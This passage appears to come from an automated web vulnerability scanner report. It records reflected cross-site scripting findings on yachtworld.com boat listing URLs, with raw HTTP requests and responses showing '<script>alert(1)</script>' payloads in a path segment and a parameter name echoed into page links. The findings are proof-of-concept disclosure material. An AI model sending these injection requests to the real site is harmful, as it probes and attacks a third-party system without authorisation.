savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:28 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:28 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VAa142d"><script>alert(1)</script>12c59d7a8be/United-States&boat_id=2305173">
...[SNIP]...

3.95. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a67c"><script>alert(1)</script>266250d89b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States7a67c"><script>alert(1)</script>266250d89b2 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:55 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States7a67c"><script>alert(1)</script>266250d89b2&boat_id=2305173">
...[SNIP]...

3.96. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138a0"><script>alert(1)</script>a5a2c4dcb2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States?138a0"><script>alert(1)</script>a5a2c4dcb2d=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:17 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FU